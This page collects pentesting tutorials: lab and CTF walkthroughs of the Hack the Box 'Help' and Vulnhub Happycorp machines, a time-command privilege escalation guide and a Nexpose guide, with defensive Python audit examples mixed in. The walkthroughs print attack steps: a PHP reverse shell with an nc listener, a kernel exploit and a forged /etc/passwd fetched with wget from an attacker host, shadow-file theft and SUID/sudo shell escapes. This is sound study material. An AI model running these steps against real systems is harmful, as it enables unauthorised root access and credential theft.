Hack the Box: Help Walkthrough


Help is a recently retired CTF challenge VM on Hack the Box, and the objective remains the same: capture the root flag. Hack the Box offers a wide range of VMs for practice, from beginner to advanced level, and it is great for penetration testers and researchers.

Level: Intermediate
Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Help is 10.10.10.121

Penetration Methodology
Scanning
  • Network Scanning (Nmap)
Enumeration
  • Web Spidering (dirb)
Exploiting
  • Analyzing behaviour of submit ticket script
  • Uploading PHP shell and noting timestamp
  • Converting shell+timestamp to md5 hash
  • Finding shell on web server
  • Getting reverse shell through netcat
  • Reading user.txt
Privilege Escalation
  • Finding kernel exploit of Linux 4.4.0 version.
  • Compiling with GCC and escalating privilege
  • Reading root.txt

Walkthrough

Scanning
Let's start off with the most obvious step, an nmap scan to check for open ports.
nmap -A 10.10.10.121

Here I found that port 22 for SSH and ports 80 and 3000 for HTTP were open; the others were filtered.


We immediately proceeded to port 80 when we saw it open, but there was absolutely nothing on the homepage.



Enumeration
But maybe there is some other directory set as the homepage of the web application, so we did not stop short of directory enumeration with dirb.



Here we found two directories. One is the javascript directory, which is usually of little use. But then there is another directory called /support, which seemed interesting. We checked it in the browser, and it looked like a ticketing system.


Exploiting

Now, it is obvious that any ticketing system will offer a file upload option, and it is also possible that there is a vulnerability in the file upload mechanism.
We created a sample text file called demo.txt just to check whether the system actually accepts uploads.
It seemed to be working fine!!


It successfully got uploaded and redirected us back to the homepage.


Now we tried enumerating the web server at a deeper level, but we couldn't see our text file anywhere. It is possible that the PHP backend had simply renamed the file according to developer-defined rules. If only there was a way to check the code!
After googling HelpDeskZ, we found that the source code is available on GitHub, which gives us a closer look at the code of the upload script.
In controllers/submit_ticket_controller.php, we found the code responsible for uploading a file to the server.
There are three noteworthy things here:
1. The uploaded file goes to "/support//tickets"
2. There is no check on the type of file being uploaded! The error message is generated after the file has already been uploaded, so it has no actual significance!
3. The uploaded file is renamed in the format: md5(shellname + epoch timestamp) + .php
We are certain that it is in fact an epoch timestamp because of how PHP's time() function works.
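To make points 2 and 3 concrete, here is an added Python model (not HelpDeskZ's code) of the upload logic the walkthrough describes, beside a hardened version: the vulnerable path writes the file and only then decides on an error message, naming it md5(name + timestamp).php; the hardened path validates an extension allowlist before writing and uses a random name. The sample name, timestamp and in-memory store are constructed.

```python
import hashlib
import os
import secrets

# Constructed sample values: the upload name and epoch timestamp used in the walkthrough.
ORIGINAL_NAME = "myshell.php"
UPLOAD_TIME = 1560956116
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "jpeg", "pdf"}


def helpdeskz_style_name(original_name: str, epoch: int) -> str:
    """The naming scheme the walkthrough describes: md5(name + time()) + '.php'.
    Every input is either chosen by the uploader or a second-resolution clock,
    so the stored name is predictable rather than secret."""
    digest = hashlib.md5(f"{original_name}{epoch}".encode()).hexdigest()
    return digest + ".php"


def vulnerable_save(original_name: str, content: bytes, epoch: int, store: dict) -> str:
    """Models the order of operations the walkthrough points out: the file is
    stored first, and the extension check only decides the message shown to the
    user afterwards. Returns the message; the file stays in `store` either way."""
    stored_name = helpdeskz_style_name(original_name, epoch)
    store[stored_name] = content
    ext = os.path.splitext(original_name)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return "File is not allowed."  # too late: the file is already stored
    return "File uploaded."


def hardened_save(original_name: str, content: bytes, store: dict) -> str:
    """Hardened form: validate before writing, keep only an allowlisted
    extension, and use a random name so the stored file can be neither executed
    by the web server (never .php) nor located by guessing. Returns the name."""
    ext = os.path.splitext(original_name)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is not allowed")
    if len(content) > 5 * 1024 * 1024:
        raise ValueError("file too large")
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    store[stored_name] = content  # in real code: a directory outside the web root
    return stored_name


if __name__ == "__main__":
    vuln_store, safe_store = {}, {}
    print(vulnerable_save(ORIGINAL_NAME, b"<?php /* placeholder */ ?>", UPLOAD_TIME, vuln_store))
    print("still stored as:", list(vuln_store))
    try:
        hardened_save(ORIGINAL_NAME, b"<?php /* placeholder */ ?>", safe_store)
    except ValueError as exc:
        print("rejected:", exc, "| stored:", list(safe_store))
    print("accepted as:", hardened_save("demo.txt", b"hello", safe_store))
```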


So it is pretty clear that we will upload a PHP reverse shell (we took pentestmonkey's reverse netcat PHP shell) and work towards exploiting this file upload vulnerability. But we were unable to find our text file a few minutes ago. Now that we know the format in which the file is stored on the web server, let's work our way towards manually creating the md5 hash.
For this, we need to know the current time on the web server. Our time zone could be very different from the server's, so to generate an exact timestamp we upload the PHP shell while capturing the network request in Firefox's developer tools.


Now that we had the time in GMT, we headed to www.epochconverter.com and converted this time into an epoch timestamp.


Now that we had obtained this timestamp, we could either write a short PHP script that uses the md5 function to generate the hash, or simply open PHP in interactive mode:
php -a
echo md5("myshell.php1560956116");
Your timestamp will differ from ours.


Now that we had the hash, all that was left to do was to find the file, open it in our browser, set up a reverse nc listener and get a shell.
As noted above, we know it is being uploaded to "/support//tickets", but the problem was that we didn't know the name of the upload directory. Our best bet was the name "uploads", since we saw that folder name in the GitHub files as well.


So, we set up a reverse netcat listener and got a shell immediately! We spawned a proper TTY using python and read the user.txt file in the home directory.
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /home/help
cat user.txt


Privilege Escalation
Now for the privilege escalation part, we checked the kernel version with uname -a and found it to be vulnerable to a kernel exploit. We downloaded it using searchsploit, and that made it super easy!
searchsploit 4.4.0-116
searchsploit -m 44298
python -m SimpleHTTPServer 8081


We changed directory to /tmp, downloaded the exploit using wget, compiled it with GCC, and boom went the magic!
gcc 44298.c -o kernel
./kernel
cd /root

And voila! That’s how we escalated privilege in Help CTF and read the congratulatory message under root directory in root.txt.

Linux for Pentester: Time Privilege Escalation


In this article, we'll talk about the time command, a Linux utility, learn how helpful it is for Linux penetration testing, and see how we can abuse time to obtain a higher-privileged shell.

Table of Contents
All About Linux Time Command
Major Operations Performed by Time
Abusing Time Utility
·         SUID Lab Setups for Privilege Escalation
·         Privilege Escalation
·         Sudo Lab Setups for Privilege Escalation
·         Privilege Escalation

All About Linux Time Command
The time command runs the specified program with the given arguments. When the program finishes, time writes a message to standard error giving timing statistics about the run.
These statistics consist of:
·         the elapsed real time between invocation and termination named as real.
·         the user CPU time named as user.
·         the system CPU time named as sys.

time may exist as a stand-alone program (such as GNU time) or as a shell keyword (in sh, bash, tcsh or zsh).
To identify every installed kind of time, run:
type -a time
Here "time is a shell keyword" means it is a keyword built into bash, whereas "time is /usr/bin/time" denotes the GNU time binary.



One can use the "help time" or "man time" commands to explore the summary and see what the time command is for.
Run Command
As said above, the time command computes timing statistics for any program run (a pipeline's execution). For example, to compute the time taken by the date command:
For Bash: time date
For GNU: /usr/bin/time date
/usr/bin/time -p date

As a result you will notice that it first ran the date command and printed the complete date with time zone, and then disclosed the time taken by the date command as real, user CPU and system CPU time in seconds. The same information was printed by GNU time, with some extra information such as total inputs and outputs.
Use the -p option with /usr/bin/time to obtain output in the same form as bash's time.
Note: The real, user and system time will be zero for any program that is executed repeatedly, because the next time that program is invoked it is served from the system's cache memory.


Save Output
By default, the time command displays the timing statistics for the program in the terminal at the end of its execution, but if you want to store the statistics in a file, you can use the -o option.
Syntax: /usr/bin/time -o [output file] command
/usr/bin/time -o /tmp/ping.txt ping google.com
cat /tmp/ping.txt


Verbose Mode
You can use the -v option for verbose mode; here you can see how much time and which internal resources were used to produce the output for the given input.


Formatting String
The format string generally comprises 'resource specifiers' combined with plain text, each specifier introduced by a percent sign (%), as given below.
/usr/bin/time -f "Elapsed Time = %E, Inputs %I, Outputs %O" head -4 /etc/passwd


You can use \n for a new line to print the format string as shown in the screenshot.
/usr/bin/time -f "Elapsed Time = %E \n Inputs %I \n Outputs %O" tail -5 /etc/passwd


Abusing Time Utility
SUID Lab Setups for Privilege Escalation
The SUID bit lets a user execute a file with the privileges of the file's owner. Now we are enabling the SUID permission on time, so that a local user can take advantage of time as the root user.
Hence type the following to enable the SUID bit:
which time
chmod u+s /usr/bin/time
ls -la /usr/bin/time


Privilege Escalation
Now we will start exploiting time by taking advantage of the SUID permission. For this, I'm creating a session on the victim's machine, which gives us local user access to the targeted system.
Now we connect to the target machine with ssh.
Since we have access to the victim's machine, we use the find command to identify binaries that have the SUID permission.
find / -perm -u=s -type f 2>/dev/null
Here we came to recognise that the SUID bit is set on many binaries, but the one we are concerned with is /usr/bin/time.


Taking advantage of the SUID permission on time, we grab the shadow file to extract the password hashes.


Now I used the John the Ripper tool to crack the password hashes. By doing so we get the user's credentials, as shown in the image below.
john hash


Once we have the user's credentials we can switch user. Here we first check the sudo rights for user raj and notice that user "raj" has ALL privileges.
su raj
sudo -l
sudo su

Therefore, we switch to the root user account directly and access the root shell as shown in the image. Hence, we have successfully accomplished our task of using time utility for Privilege Escalation.


Sudo rights Lab setups for Privilege Escalation
Now our next step is to set up the lab for sudo rights, in other words to give a user sudo privileges for the time executable. Here we add a user named test to the sudoers file and give user test permission to run /usr/bin/time as the root user.


Privilege Escalation
Now we will connect through ssh from Kali and after that run sudo -l, which lists sudo rights and shows that user test has permission to run /usr/bin/time as the root user.
sudo -l
As we have seen above, the time command runs a program and computes its timing; now we take advantage of that to run a shell as root.
sudo time /bin/sh


Conclusion: In this post we have talked about the time command to demonstrate how an intruder can escalate privileges using the time utility due to the permissions allowed on it.

Beginner’s Guide to Nexpose


In this article we'll learn about Nexpose, which is used to scan a network for vulnerabilities. There are various vulnerability scanners, but what keeps Nexpose special is its smooth user interface and the robust reporting options it offers, from the most common to the advanced.
Table of Content
·         Introduction to Nexpose
·         Nexpose Virtual  Appliance Installation
·         Running Vulnerability Scans
·         Generating Reports
Introduction to Nexpose
Nexpose is one of the leading vulnerability assessment tools. It operates across physical, virtual, cloud and mobile environments to discover the active services, open ports and running applications on each machine, and it tries to identify vulnerabilities that may exist based on the attributes of the known services and applications. Nexpose presents the results in scan reports, which help to prioritise the vulnerabilities based on risk and determine the most effective solution to implement.
Some Important Nexpose terminologies
·         Assets - A host on a network.
·         Site - A logical group of assets that has a dedicated scan engine.
·         Scan Template - A template that defines the audit level that Nexpose uses to perform a vulnerability scan.
·         Local Scan Engine - Scan Engines are responsible for performing scan jobs on your assets.

Nexpose Virtual Appliance Installation
Let's start the Nexpose installation in our virtual machine. From here we've downloaded the Nexpose VM. First, we'll add Nexpose to our VMware Workstation and power it on.
As soon as it boots up, we'll see our default login credentials: username (nexpose) and password (nexpose). Furthermore, we have to set a new password according to the requirements (i.e. it should be at least 14 characters long, with at least one uppercase and one lowercase letter, a digit and a special character).


Afterwards, use the ifconfig command in Nexpose to check the machine's IP address so that we can log into Nexpose's web interface.


Now armed with the IP, we use HTTPS (i.e. Hypertext Transfer Protocol over Secure Socket Layer) and port 3780, which is Nexpose's default port.
URL :  https://:3780
We'll be greeted with a warning about the security certificate, so to use Nexpose we'll have to get through this warning. Click on Advanced, followed by Accept the Risk and Continue.
You will then be redirected to a login page; enter the default username (nxadmin) and password (nxpassword), as shown in the image below.


Further, you'll be asked for an activation key, as shown in the image; provide the license key that you received at your email address.


As soon as you've logged in and completed all the essential activations, the Nexpose Security Console page will load and we'll be able to perform any scan we desire, as shown:


Running Vulnerability Scans
In order to start with a new scan, go to the home page, click the Create dropdown and select Site. The Security Console will display the “Site Configuration” screen.


On the General tab, we have to give the name and describe our site, as in the above image. We can even set its importance from Very Low to Very High.


The Assets configuration page comprises two sections: Include and Exclude.
In the Include section, we've provided our target IP address (i.e. 192.168.0.59); if we want to scan the entire network, we provide the complete IP range instead (i.e. 192.168.0.1-254).
The Exclude section is used to exclude IPs from scanning. If we're scanning the entire IP range and want to exclude some of the IPs from the scan, we just need to put them in the exclude assets section.
Now, in the Authentication section, we can enter any credentials we need. Basically, we conduct a credentialed scan by providing the system with a username and a password.


Afterwards, set up a particular Scan Template; as shown above, we've used the default Scan Template, i.e. Full Audit without Web Spider.


Now we have to select an engine for our scan; here we're selecting the Local Scan Engine, as shown in the picture above.
Now we've completed all the required information to set up our site for a scan. To begin scanning, click the Save and Scan button at the upper right corner of the Nexpose console panel.


Once the scan is completed, the result clearly indicates the number of vulnerabilities found, the risk score and the duration of the scan.


Now we can see all the vulnerabilities listed with their Common Vulnerability Scoring System (CVSS) score, from highest to lowest, on the Vulnerabilities tab. The exciting part is that for one or more of these, exploits have been published in the Exploit Database and Metasploit modules exist.
When we click on a particular vulnerability, for instance here we've clicked on MySQL default account, which is a critical threat, it gives us information about the vulnerability such as its severity, whether it is password protected or not, its version, etc., as shown in the image below.


Generating Reports
Now we can generate new reports in the Reports tab by simply giving the report a title, selecting the scan along with the template, and choosing the format we want the report in.


Conclusion
This was a comprehensive guide to the usability of the Nexpose vulnerability scanner. Thanks to its GUI, it is user friendly and convenient, and so it has become one of the best tools, taking its place in the corporate world alongside Nessus and Retina.

Happycorp:1 Vulnhub Walkthrough


This is another post on a Vulnhub CTF named "HAPPYCORP:1" by Zayotic. It is designed for the VMware platform, and it is a boot-to-root challenge where you have to find flags to finish the task assigned by the author.
You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/
Penetration Methodology
Scanning
·         Netdiscover
·         Nmap
Enumeration
·         NFS-Share
·         Mount share directory
·         Obtain user.txt (1st flag)
·         Obtain SSH key
·         Crack SSH passphrase (John the Ripper)
Exploiting
·         Login to SSH
·         Break jail (rbash shell)
Privilege Escalation
·         Abusing SUID Binary
·         Obtain flag.txt (2nd flag)

Walkthrough
Scanning
Let’s start with network scanning to identify the IP of VM with the help of netdiscover.


So, we have our target IP 192.168.1.104. Now, let’s scan the services and ports via nmap.
nmap -A 192.168.1.104
We obtained a fruitful result from the nmap scan; as you can observe, many services are running on various ports, such as 22: SSH, 80: HTTP and so on.


Enumeration
As we always look at HTTP services first, we browsed to http://192.168.1.104 but found nothing interesting.


We found that the network share service (NFS) was also available on port 2049, so we decided to check for shared directories on the network. We therefore installed the NFS client on our local machine and ran a command to identify the shared directories available to mount on our local computer.
showmount -e 192.168.1.104
We found that /home/karl is a shared directory that we can mount on our local machine as given below:
mkdir /tmp/raj
mount 192.168.1.104:/home/karl /tmp/raj
cd /tmp/raj
ls -al
I mounted /home/karl on our /tmp/raj directory but didn't find anything here; truthfully, when I tried to open the .ssh directory, it gave a permission denied error.


Therefore, I added a user "aaru" with the group that has GID 1001 on my Kali machine and successfully accessed the .ssh folder as shown in the steps below (the same approach was used in Lin-Security).
groupadd --gid 1001 aaru
useradd --uid 1001 --gid 1001 aaru

Then we accessed our 1st flag, i.e. user.txt, and copied the id_rsa key to our local machine by executing the following commands:
sudo -u aaru ls -l .ssh
sudo -u aaru cat .ssh/user.txt
sudo -u aaru cat .ssh/id_rsa



Further, I explored id_rsa.pub and authorized_keys, where I noticed karl@happycorp and realised that karl could be the username for ssh login. Therefore, I used the id_rsa key to log into ssh as karl but failed, as the key required a passphrase.


Then we used ssh2john to convert this SSH key into a crackable file for John the Ripper and used the rockyou.txt wordlist with John.
python ssh2john.py key > ssh_login
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_login


After obtaining the passphrase "sheep", we changed the permissions of the RSA key and logged in as karl, but unfortunately we got a restricted shell, also known as rbash.
ssh -i key karl@192.168.1.104


Therefore, I tried to get a proper shell directly through ssh by simply typing the following:
ssh -i key karl@192.168.1.104 -t "/bin/sh"
Luckily it worked and we successfully got a proper shell.


Privilege Escalation

Now it's time to escalate to root privileges and finish this task, so with the help of the find command I looked for SUID-enabled binaries and found that the SUID bit is set on the copy binary (/bin/cp).
find / -perm -u=s -type f 2>/dev/null
Hmm!! If the SUID bit is set on /bin/cp, then we can copy any root-level system file or overwrite an existing file. First, I explored the /etc/passwd file, where karl was the last user as shown in the image below, and our plan is to edit this file by adding a new user.
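A defender's counterpart to the find command used here and in the SUID time lab earlier on this page, added as an example (not from the original posts): collect setuid regular files, compare them with a baseline of binaries expected to carry the bit, and rank /usr/bin/time and /bin/cp, which never need it, as high. The BASELINE, NEVER_SETUID and SAMPLE_ENTRIES values are constructed assumptions; a real baseline comes from a clean image of the same build.

```python
import os
import stat
from typing import Iterable

# Constructed baseline: setuid binaries a clean install of this image is expected to have.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/bin/mount", "/bin/umount"}
# The two binaries abused in the walkthroughs on this page; neither needs setuid.
NEVER_SETUID = {"/usr/bin/time", "/bin/cp"}

# Constructed (path, st_mode) entries standing in for a filesystem walk.
SAMPLE_ENTRIES = [
    ("/usr/bin/sudo", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/time", stat.S_IFREG | stat.S_ISUID | 0o755),   # the time lab's setup
    ("/bin/cp", stat.S_IFREG | stat.S_ISUID | 0o755),         # Happycorp's finding
    ("/usr/local/bin/backup", stat.S_IFREG | stat.S_ISUID | 0o755),  # unknown, needs review
    ("/bin/ls", stat.S_IFREG | 0o755),                        # no setuid bit
    ("/tmp/d", stat.S_IFDIR | stat.S_ISUID | 0o755),          # setuid on a dir is ignored
]


def is_setuid(mode: int) -> bool:
    """Regular file with the setuid bit, the same filter as find's -perm -u=s -type f."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def setuid_files(entries: Iterable[tuple[str, int]]) -> set[str]:
    return {path for path, mode in entries if is_setuid(mode)}


def scan_filesystem(root: str = "/") -> list[tuple[str, int]]:
    """Gather real (path, st_mode) pairs with lstat; unreadable paths are skipped,
    matching the walkthrough's 2>/dev/null."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                out.append((path, os.lstat(path).st_mode))
            except OSError:
                continue
    return out


def audit(found: set[str], baseline: set[str] = BASELINE) -> dict[str, list[str]]:
    """Split findings into what the baseline explains and what needs a human:
    high = known shell-capable binaries that should never be setuid,
    review = anything else not in the baseline, missing = expected bit removed."""
    unexpected = sorted(found - baseline)
    return {
        "high": [p for p in unexpected if p in NEVER_SETUID],
        "review": [p for p in unexpected if p not in NEVER_SETUID],
        "missing": sorted(baseline - found),
    }


if __name__ == "__main__":
    # Swap SAMPLE_ENTRIES for scan_filesystem() to audit the host you are on.
    for level, paths in audit(setuid_files(SAMPLE_ENTRIES)).items():
        print(f"{level}: {paths}")
```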


Meanwhile, we generated a new encrypted password for pass123 using OpenSSL passwd:
openssl passwd -1 -salt ignite pass123


So, we copied the whole content of the /etc/passwd file into a text editor and then created a new record for user "ignite" that has root-level permissions. We saved this file as passwd and used a python server to transfer it to the victim's machine.


Inside the /tmp folder we downloaded our passwd file and, with the help of the copy command, replaced the original /etc/passwd with our file as shown below.
cd /tmp
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd
su ignite
cd /root
cat root.txt
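The record added above is exactly what an /etc/passwd integrity check should catch, so here is an added Python audit (not part of the walkthrough) over a constructed passwd sample: it flags a second UID 0 account, a password hash stored in the passwd field instead of /etc/shadow, empty password fields, duplicate UIDs and malformed records. The ignite line's hash is a placeholder, not real openssl output.

```python
from dataclasses import dataclass

# Constructed sample /etc/passwd; the last line models the record the walkthrough adds.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
karl:x:1001:1001:Karl,,,:/home/karl:/bin/rbash
ignite:$1$ignite$PLACEHOLDERHASHVALUE000:0:0::/root:/bin/bash
"""

# Values that legitimately appear in the password field when hashes live in /etc/shadow.
SHADOWED = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def parse_passwd(text: str) -> list[tuple[int, list[str]]]:
    """Return (line number, 7 fields) per record; a wrong field count is kept
    and marked so the audit can report it instead of silently skipping it."""
    rows = []
    for n, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        rows.append((n, fields if len(fields) == 7 else ["<malformed>", line]))
    return rows


def audit_passwd(text: str) -> list[Finding]:
    findings = []
    seen_uid = {}
    for n, f in parse_passwd(text):
        if f[0] == "<malformed>":
            findings.append(Finding(n, f[1].split(":")[0], "malformed record"))
            continue
        user, pw, uid = f[0], f[1], f[2]
        if pw == "":
            findings.append(Finding(n, user, "empty password field"))
        elif pw not in SHADOWED:  # a hash here bypasses the protections on /etc/shadow
            findings.append(Finding(n, user, "password hash stored in /etc/passwd"))
        if uid == "0" and user != "root":
            findings.append(Finding(n, user, "extra UID 0 account"))
        if uid in seen_uid:
            findings.append(Finding(n, user, f"duplicate UID {uid} (also {seen_uid[uid]})"))
        seen_uid.setdefault(uid, user)
    return findings


if __name__ == "__main__":
    # Replace SAMPLE_PASSWD with open("/etc/passwd").read() to audit a live host.
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {finding.line_no}: {finding.user}: {finding.reason}")
```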